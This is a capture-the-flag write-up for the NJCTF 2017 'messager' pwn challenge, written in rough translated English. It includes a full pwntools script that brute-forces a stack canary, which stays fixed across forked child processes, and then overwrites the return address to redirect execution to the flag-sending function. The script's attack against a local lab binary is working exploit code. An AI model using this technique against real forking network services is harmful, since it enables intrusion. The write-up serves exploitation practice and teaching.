NJCTF 2017messager

First, write a flag file .

echo “FLAG{THIS_IS_FLAG}” > flag

The program starts with flag Remove from the file , Store in unk_602160, Correspondingly, one passed socket send out flag Function of sub_400BC6(), The ultimate goal is to control the program to return to this function .
This question is open Canary Protect , But he starts one subprocess at a time , therefore Canary The value of does not change , We can blow it out , notes ： Be sure to use python2, If a master knows why to use python3 If not , I really hope you can tell me .

from pwn import *

def leak_canary():
	global canary
	canary = "\x00"
	while len(canary) < 8:
		for x in range(0, 256):
			io = remote("127.0.0.1", 5555)
			io.recv()
			io.send("A"*104 + canary + chr(x))
			try:
				io.recv()
				canary += chr(x)
				break
			except:
				continue
			finally:
				io.close()
	print(canary)
	# print("canary: 0x%s" % canary.encode('hex'))

def pwn():
	io = remote("127.0.0.1", 5555)
	io.rec()

	payload = flat(['A' * 104,canary,"A"*8,p64(0x400bc6)])
	io.send(payload)
	print(io.recvline())

if __name__=='__main__':
	leak_canary()
	pwn()